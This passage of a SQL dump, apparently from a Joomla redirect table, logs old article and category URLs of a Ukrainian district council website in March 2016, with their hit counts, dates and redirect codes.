00:00:00',301),(27191,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=577:--------2011--&catid=39:-22022012-&Itemid=76&lang=en','','','',6,0,'2016-03-11 22:38:12','0000-00-00 00:00:00',301),(27192,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=978:-6612-&Itemid=14&lang=en&option=com_content&view=article','','','',34,0,'2016-03-11 23:50:18','0000-00-00 00:00:00',301),(27193,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=957:199-&Itemid=&lang=ru&option=com_content&view=article','','','',34,0,'2016-03-11 23:51:01','0000-00-00 00:00:00',301),(27194,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=825:-q-q&Itemid=14&lang=ru&option=com_content&view=article','','','',4,0,'2016-03-11 23:51:50','0000-00-00 00:00:00',301),(27195,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=830:2012-11-27-08-09-31&Itemid=14&lang=en&option=com_content&view=article','','','',31,0,'2016-03-11 23:52:01','0000-00-00 00:00:00',301),(27196,'http://www.malyn-rayrada.org.ua/index.php?catid=41&id=663:-------20042012675-12&Itemid=78&lang=en&option=com_content&view=article','','','',13,0,'2016-03-11 23:52:11','0000-00-00 00:00:00',301),(27197,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=184:-15-1000-&catid=11&Itemid=16&lang=uk','','','',4,0,'2016-03-12 01:42:59','0000-00-00 00:00:00',301),(27198,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=976:2013-03-21-18-42-06&Itemid=14&lang=uk&option=com_content&view=article','','','',11,0,'2016-03-12 02:12:24','0000-00-00 00:00:00',301),(27199,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=878:2012-12-21-16-59-28&Itemid=85&lang=uk&option=com_content&view=article','','','',12,0,'2016-03-12 02:13:55','0000-00-00 00:00:00',301),(27200,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=825:-q-q','','','',13,0,'2016-03-12 02:16:03','0000-00-00 00:00:00',301),(27201,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1173:2014-01-15-10-37-18&Itemid=&lang=uk&option=com_content&view=article','','','',12,0,'2016-03-12 02:16:45','0000-00-00 00:00:00',301),(27202,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=791:2012-10-17-06-06-34&Itemid=84&lang=ru&option=com_content&view=article','','','',9,0,'2016-03-12 02:16:48','0000-00-00 00:00:00',301),(27203,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=892:2013-01-08-13-26-18&Itemid=0&lang=en&option=com_content&view=article','','','',11,0,'2016-03-12 02:17:13','0000-00-00 00:00:00',301),(27204,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=729:-l20-r&Itemid=14&lang=uk&option=com_content&view=article','','','',11,0,'2016-03-12 02:17:17','0000-00-00 00:00:00',301),(27205,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1066:-23-&Itemid=14&lang=ru&option=com_content&view=article','','','',12,0,'2016-03-12 02:17:46','0000-00-00 00:00:00',301),(27206,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=959:2013-03-11-06-19-41&Itemid=88&lang=uk&option=com_content&view=article','','','',12,0,'2016-03-12 02:18:01','0000-00-00 00:00:00',301),(27207,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=799:2012-10-18-13-37-03&Itemid=84&lang=ru&option=com_content&view=article','','','',12,0,'2016-03-12 02:18:01','0000-00-00 00:00:00',301),(27208,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=788:-lr-2012-2015-&Itemid=84&lang=en&option=com_content&view=article','','','',11,0,'2016-03-12 02:18:04','0000-00-00 00:00:00',301),(27209,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=972:2013-03-19-10-50-05&Itemid=88&lang=uk&option=com_content&view=article','','','',11,0,'2016-03-12 02:18:06','0000-00-00 00:00:00',301),(27210,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1216:-q-q&Itemid=0&lang=en&option=com_content&view=article','','','',12,0,'2016-03-12 02:18:21','0000-00-00 00:00:00',301),(27211,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=772:-2011-2012-&Itemid=84&lang=uk&option=com_content&view=article','','','',12,0,'2016-03-12 02:18:24','0000-00-00 00:00:00',301),(27212,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=563:-30012012185-12&Itemid=76&lang=ru&option=com_content&view=article','','','',12,0,'2016-03-12 02:18:26','0000-00-00 00:00:00',301),(27213,'http://www.malyn-rayrada.org.ua/index.php?catid=15:2010-06-06-09-34-01&id=1106:-qq&Itemid=18&lang=en&option=com_content&view=article','','','',11,0,'2016-03-12 02:18:28','0000-00-00 00:00:00',301),(27214,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=796:2012-10-18-07-54-09&catid=45:--14112012-&Itemid=84&lang=ru','','','',12,0,'2016-03-12 02:18:49','0000-00-00 00:00:00',301),(27215,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46:--21122012&id=867:2012-12-14-10-13-30&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-12 03:23:37','0000-00-00 00:00:00',301),(27216,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=939:-18-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-12 04:54:44','0000-00-00 00:00:00',301),(27217,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1110:-9-2013-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-12 06:17:25','0000-00-00 00:00:00',301),(27218,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=802:-i-i-i-i-i&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-12 07:37:03','0000-00-00 00:00:00',301),(27219,'http://www.malyn-rayrada.org.ua/index.php?Itemid=42&catid=20&id=186:-6-&lang=uk&option=com_content&view=article','','','',4,0,'2016-03-12 08:03:33','0000-00-00 00:00:00',301),(27220,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=890:2014-01-06-08-19-15&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-12 15:42:13','0000-00-00 00:00:00',301),(27221,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1202:2014-01-31-07-45-54&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-12 17:05:11','0000-00-00 00:00:00',301),(27222,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=926:2013-02-21-09-02-30&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-12 18:50:08','0000-00-00 00:00:00',301),(27223,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1052:2013-07-19-11-32-33&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-12 19:54:19','0000-00-00 00:00:00',301),(27224,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=991:2013-04-22-08-24-54&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-12 20:43:24','0000-00-00 00:00:00',301),(27225,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=696:-14-6-&lang=ru&option=com_content&view=article','','','',3,0,'2016-03-12 21:29:47','0000-00-00 00:00:00',301),(27226,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=797:-6-16112010-5-&catid=45:--14112012-&Itemid=84&lang=ru','','','',3,0,'2016-03-12 22:46:49','0000-00-00 00:00:00',301),(27227,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1173:2014-01-15-10-37-18&lang=en&option=com_content&view=article','','','',3,0,'2016-03-12 22:53:47','0000-00-00 00:00:00',301),(27228,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1093:------------2017-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-12 23:00:10','0000-00-00 00:00:00',301),(27229,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=799:2012-10-18-13-37-03&Itemid=84&lang=ru&option=com_content&view=article','','','',9,0,'2016-03-12 23:28:52','0000-00-00 00:00:00',301),(27230,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=956:2013-03-07-14-51-33&Itemid=14&lang=uk&option=com_content&view=article','','','',9,0,'2016-03-12 23:29:09','0000-00-00 00:00:00',301),(27231,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=7:2010-06-05-14-44-23&catid=2:2010-06-05-12-50-39&Itemid=5&lang=uk','','','',6,0,'2016-03-12 23:29:20','0000-00-00 00:00:00',301),(27232,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=939:-18-&Itemid=14&lang=uk&option=com_content&view=article','','','',6,0,'2016-03-12 23:29:21','0000-00-00 00:00:00',301),(27233,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=407:-l-r-2010-2015-&catid=37:--21102011-&Itemid=72&lang=ru','','','',6,0,'2016-03-12 23:29:22','0000-00-00 00:00:00',301),(27234,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1044:2013-07-05-11-26-05&Itemid=92&lang=ru&option=com_content&view=article','','','',7,0,'2016-03-12 23:29:32','0000-00-00 00:00:00',301),(27235,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=462:-2012-&Itemid=73&lang=en&option=com_content&view=article','','','',7,0,'2016-03-12 23:29:34','0000-00-00 00:00:00',301),(27236,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-?start=5','','','',6,0,'2016-03-13 00:11:52','0000-00-00 00:00:00',301),(27237,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=862:------qq&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-13 00:47:34','0000-00-00 00:00:00',301),(27238,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=86:2010-08-09-09-12-32&catid=11&Itemid=16&lang=en','','','',7,0,'2016-03-13 01:02:10','0000-00-00 00:00:00',301),(27239,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=957:199-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-13 02:48:30','0000-00-00 00:00:00',301),(27240,'http://www.malyn-rayrada.org.ua/index.php?Itemid=105&catid=58:--30042014-&id=1294:-2012-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-13 03:59:42','0000-00-00 00:00:00',301),(27241,'http://www.malyn-rayrada.org.ua/index.php?Itemid=61&id=30&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-13 05:36:42','0000-00-00 00:00:00',301),(27242,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=722:2012-06-15-13-56-24&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-13 06:05:35','0000-00-00 00:00:00',301),(27243,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&id=42:--16052012-&lang=en&layout=blog&option=com_content&view=category','','','',2,0,'2016-03-13 06:48:56','0000-00-00 00:00:00',301),(27244,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=197:-----l-r--2004-2010-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-13 07:02:05','0000-00-00 00:00:00',301),(27245,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1106:-qq&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-13 08:45:30','0000-00-00 00:00:00',301),(27246,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=86:2010-08-09-09-12-32&catid=11:2010-06-05-14-33-33&Itemid=16&lang=ru','','','',4,0,'2016-03-13 09:54:28','0000-00-00 00:00:00',301),(27247,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=861:-qq&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-13 12:11:57','0000-00-00 00:00:00',301),(27248,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=568:-2011-&catid=11&lang=en&Itemid=','','','',5,0,'2016-03-13 12:24:13','0000-00-00 00:00:00',301),(27249,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1154:7-&lang=en&option=com_content&view=article','','','',4,0,'2016-03-13 13:10:36','0000-00-00 00:00:00',301),(27250,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=49:--12042013-&layout=blog&Itemid=3&lang=ru&limitstart=5','','','',14,0,'2016-03-13 13:36:10','0000-00-00 00:00:00',301),(27251,'http://www.malyn-rayrada.org.ua/index.php?catid=48&id=955:2013-03-07-06-31-04&Itemid=87&lang=uk&option=com_content&view=article','','','',6,0,'2016-03-13 14:13:32','0000-00-00 00:00:00',301),(27252,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=56&Itemid=97&lang=en&limitstart=10','','','',4,0,'2016-03-13 14:15:54','0000-00-00 00:00:00',301),(27253,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=687:2012-05-24-11-21-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2016-03-13 14:35:59','0000-00-00 00:00:00',301),(27254,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=34&layout=blog&Itemid=68&lang=ru','','','',4,0,'2016-03-13 14:38:32','0000-00-00 00:00:00',301),(27255,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1162:2013-12-19-06-13-29&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-13 16:27:52','0000-00-00 00:00:00',301),(27256,'http://malyn-rayrada.org.ua/index.php/1140-starovorob-jivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-03-13 16:46:54','0000-00-00 00:00:00',301),(27257,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=898:----------14-112012332-l-----r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2016-03-13 18:08:09','0000-00-00 00:00:00',301),(27258,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46&id=843:-l-r&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-13 19:16:05','0000-00-00 00:00:00',301),(27259,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1097:2013-09-25-08-35-50&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-13 19:32:13','0000-00-00 00:00:00',301),(27260,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=712:2012-06-14-15-11-24&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-13 19:40:39','0000-00-00 00:00:00',301),(27261,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=525:2011-12-30-10-19-27&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-13 19:56:08','0000-00-00 00:00:00',301),(27262,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37:--21102011-&id=411:-2014-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-13 19:56:09','0000-00-00 00:00:00',301),(27263,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=333:-2011-&catid=33:-20052011&Itemid=66&lang=en','','','',4,0,'2016-03-13 20:04:03','0000-00-00 00:00:00',301),(27264,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1059-2013-07-24-05-42-15?lang=uk','','','',5,0,'2016-03-13 22:58:29','0000-00-00 00:00:00',301),(27265,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=970:-90-','','','',7,0,'2016-03-13 22:58:45','0000-00-00 00:00:00',301),(27266,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1125:2013-10-31-07-20-16&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-13 23:03:11','0000-00-00 00:00:00',301),(27267,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=740:-lr-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-14 03:35:51','0000-00-00 00:00:00',301),(27268,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&__543__lang=en&id=49&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2016-03-14 04:47:48','0000-00-00 00:00:00',301),(27269,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&catid=34:--15062011-&id=348:2011-06-15-12-35-38&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-14 06:45:55','0000-00-00 00:00:00',301),(27270,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=805:2012-10-30-13-35-53&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-14 07:33:11','0000-00-00 00:00:00',301),(27271,'http://www.malyn-rayrada.org.ua/index.php?Itemid=5&catid=2&id=7:2010-06-05-14-44-23&lang=en&option=com_content&view=article','','','',1,0,'2016-03-14 07:46:18','0000-00-00 00:00:00',301),(27272,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1093:-2017-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-14 07:46:19','0000-00-00 00:00:00',301),(27273,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1203:-2014-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-14 11:00:30','0000-00-00 00:00:00',301),(27274,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=542:-2011-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-14 11:20:05','0000-00-00 00:00:00',301),(27275,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=314:2011-05-20-13-01-00&catid=33:-20052011&Itemid=66&lang=ru','','','',1,0,'2016-03-14 15:26:12','0000-00-00 00:00:00',301),(27276,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=729:-l20-r&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-14 15:46:16','0000-00-00 00:00:00',301),(27277,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=462:-2012-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-14 16:11:37','0000-00-00 00:00:00',301),(27278,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43&lan__7bf__g=en&lang=uk&layout=blog&option=com_content&view=category','','','',2,0,'2016-03-14 21:49:23','0000-00-00 00:00:00',301),(27279,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1215:-1200-&lang=uk&option=com_content&view=article','','','',9,0,'2016-03-14 21:49:32','0000-00-00 00:00:00',301),(27280,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/978--6612-?Itemid=0&lang=en','','','',1,0,'2016-03-14 21:51:46','0000-00-00 00:00:00',301),(27281,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=845:-2012-2013-&catid=46:--21122012&Itemid=85&lang=uk','','','',3,0,'2016-03-14 21:52:02','0000-00-00 00:00:00',301),(27282,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=990:-2013-','','','',1,0,'2016-03-14 21:54:16','0000-00-00 00:00:00',301),(27283,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1146:2013-11-27-10-09-00&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-14 21:54:27','0000-00-00 00:00:00',301),(27284,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=1216:-q-q','','','',1,0,'2016-03-14 21:58:19','0000-00-00 00:00:00',301),(27285,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=466:--------l-r------2011-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2016-03-14 23:46:18','0000-00-00 00:00:00',301),(27286,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=872:2012-12-17-18-45-20&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-15 03:59:21','0000-00-00 00:00:00',301),(27287,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=730:2012-07-02-05-04-18&catid=11&Itemid=14&lang=ru','','','',1,0,'2016-03-15 04:10:27','0000-00-00 00:00:00',301),(27288,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=817:---------------l--r&lang=en&option=com_content&view=article','','','',2,0,'2016-03-15 04:29:33','0000-00-00 00:00:00',301),(27289,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=771:-2012-2015-&lang=ru&option=com_content&view=article','','','',3,0,'2016-03-15 05:39:06','0000-00-00 00:00:00',301),(27290,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=614:2012-03-26-16-06-35&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-15 05:49:39','0000-00-00 00:00:00',301),(27291,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37:--21102011-&id=439:2011-10-21-16-22-19&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-15 08:31:17','0000-00-00 00:00:00',301),(27292,'http://malyn-rayrada.org.ua/includes/tmp.php','','','',1,0,'2016-03-15 11:22:58','0000-00-00 00:00:00',301),(27293,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=646:2012-04-08-07-58-55&Itemid=0&lang=en&option=com_content&view=article','','','',5,0,'2016-03-15 11:55:13','0000-00-00 00:00:00',301),(27294,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=919:2013-01-31-10-15-40','','','',1,0,'2016-03-15 12:45:31','0000-00-00 00:00:00',301),(27295,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=413:-2011-2012-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-15 18:07:28','0000-00-00 00:00:00',301),(27296,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/745-2012-07-30-09-12-07?lang=en','','','',1,0,'2016-03-15 21:50:07','0000-00-00 00:00:00',301),(27305,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=1066:-23-','','','',3,0,'2016-03-16 08:35:28','0000-00-00 00:00:00',301),(27306,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1075:2013-09-06-09-25-33&Itemid=0&lang=en&option=com_content&view=article','','','',8,0,'2016-03-16 08:36:15','0000-00-00 00:00:00',301),(27307,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=839:2012-12-07-08-59-49&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2016-03-16 13:30:34','0000-00-00 00:00:00',301),(27308,'http://malyn-rayrada.org.ua/index.php/729-vitaemo-usih-zhinok-iz-svjato','','','',4,0,'2016-03-16 15:07:50','0000-00-00 00:00:00',301),(27309,'http://malyn-rayrada.org.ua/index.php/906-pro-sklikannya-35-sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-03-16 15:07:53','0000-00-00 00:00:00',301),(27310,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=18:2010-06-06-10-06-41&catid=15&lang=en','','','',4,0,'2016-03-16 15:09:37','0000-00-00 00:00:00',301),(27311,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=18:2010-06-06-10-06-41&catid=15&lang=ru&Itemid=','','','',4,0,'2016-03-16 15:09:38','0000-00-00 00:00:00',301),(27312,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=18:2010-06-06-10-06-41&catid=15&lang=uk&Itemid=','','','',4,0,'2016-03-16 15:09:40','0000-00-00 00:00:00',301),(27313,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=513:-lr-2012-2015-&catid=38&Itemid=73&lang=en','','','',4,0,'2016-03-16 15:09:42','0000-00-00 00:00:00',301),(27314,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=513:-lr-2012-2015-&catid=38&Itemid=73&lang=ru','','','',4,0,'2016-03-16 15:09:43','0000-00-00 00:00:00',301),(27315,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=731:2012-07-02-08-51-09&catid=11&lang=ru','','','',4,0,'2016-03-16 15:09:45','0000-00-00 00:00:00',301),(27316,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=745:2012-07-30-09-12-07&catid=11&lang=en&Itemid=','','','',4,0,'2016-03-16 15:09:47','0000-00-00 00:00:00',301),(27317,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=745:2012-07-30-09-12-07&catid=11&lang=ru','','','',4,0,'2016-03-16 15:09:48','0000-00-00 00:00:00',301),(27318,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=745:2012-07-30-09-12-07&catid=11&lang=ru&Itemid=','','','',4,0,'2016-03-16 15:09:49','0000-00-00 00:00:00',301),(27319,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=745:2012-07-30-09-12-07&catid=11&lang=uk&Itemid=','','','',4,0,'2016-03-16 15:09:52','0000-00-00 00:00:00',301),(27320,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=813:2012-11-12-16-44-40&catid=11&lang=en&Itemid=','','','',4,0,'2016-03-16 15:10:05','0000-00-00 00:00:00',301),(27321,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=813:2012-11-12-16-44-40&catid=11&lang=ru&Itemid=','','','',4,0,'2016-03-16 15:10:07','0000-00-00 00:00:00',301),(27322,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=813:2012-11-12-16-44-40&catid=11&lang=uk&Itemid=','','','',4,0,'2016-03-16 15:10:08','0000-00-00 00:00:00',301),(27323,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=825:-q-q&catid=11&lang=en','','','',4,0,'2016-03-16 15:10:10','0000-00-00 00:00:00',301),(27324,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=825:-q-q&catid=11&lang=en&Itemid=','','','',4,0,'2016-03-16 15:10:12','0000-00-00 00:00:00',301),(27325,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=825:-q-q&catid=11&lang=ru','','','',4,0,'2016-03-16 15:10:14','0000-00-00 00:00:00',301),(27326,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=825:-q-q&catid=11&lang=ru&Itemid=','','','',4,0,'2016-03-16 15:10:15','0000-00-00 00:00:00',301),(27327,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=830:2012-11-27-08-09-31&catid=11&lang=en&Itemid=0','','','',4,0,'2016-03-16 15:10:17','0000-00-00 00:00:00',301),(27328,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=830:2012-11-27-08-09-31&catid=11&lang=ru&Itemid=0','','','',4,0,'2016-03-16 15:10:19','0000-00-00 00:00:00',301),(27329,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=830:2012-11-27-08-09-31&catid=11&lang=uk&Itemid=0','','','',4,0,'2016-03-16 15:10:20','0000-00-00 00:00:00',301),(27330,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=37:--21102011-&layout=blog&Itemid=72&lang=ru&limitstart=15','','','',2,0,'2016-03-16 15:26:57','0000-00-00 00:00:00',301),(27331,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1102:2013-10-03-08-08-33&Itemid=14&lang=en&option=com_content&view=article','','','',7,0,'2016-03-17 03:09:18','0000-00-00 00:00:00',301),(27332,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-?start=5','','','',1,0,'2016-03-17 11:34:24','0000-00-00 00:00:00',301),(27334,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1075:2013-09-06-09-25-33&Itemid=&lang=en&option=com_content&view=article','','','',3,0,'2016-03-17 23:54:02','0000-00-00 00:00:00',301),(27335,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=822:----------2012--2013-----------------l-r&catid=45:--14112012-&Itemid=84&lang=en','','','',12,0,'2016-03-18 02:50:24','0000-00-00 00:00:00',301),(27336,'http://malyn-rayrada.org.ua/index.php/1378-vitaemo-iz-svyatom-vesni','','','',4,0,'2016-03-18 06:45:55','0000-00-00 00:00:00',301),(27337,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen?catid=1350&id=1350:zvernennya-spetsialistiv-veterinarnoji-meditsini-do-zhiteliv-m-malina-ta-malinskogo-rajonu','','','',1,0,'2016-03-18 08:01:51','0000-00-00 00:00:00',301),(27338,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=359:2011-06-30-11-10-42&catid=35:2011-06-30-10-56-57&Itemid=69&lang=en','','','',2,0,'2016-03-18 11:16:04','0000-00-00 00:00:00',301),(27340,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/images/stories/boks.jpg','','','',1,0,'2016-03-18 21:43:07','0000-00-00 00:00:00',301),(27341,'http://www.malyn-rayrada.org.ua/index.php/1356-ogoloshennya','','','',16,0,'2016-03-18 21:46:45','0000-00-00 00:00:00',301),(27342,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1044:2013-07-05-11-26-05&Itemid=92&lang=en&option=com_content&view=article','','','',2,0,'2016-03-18 23:51:24','0000-00-00 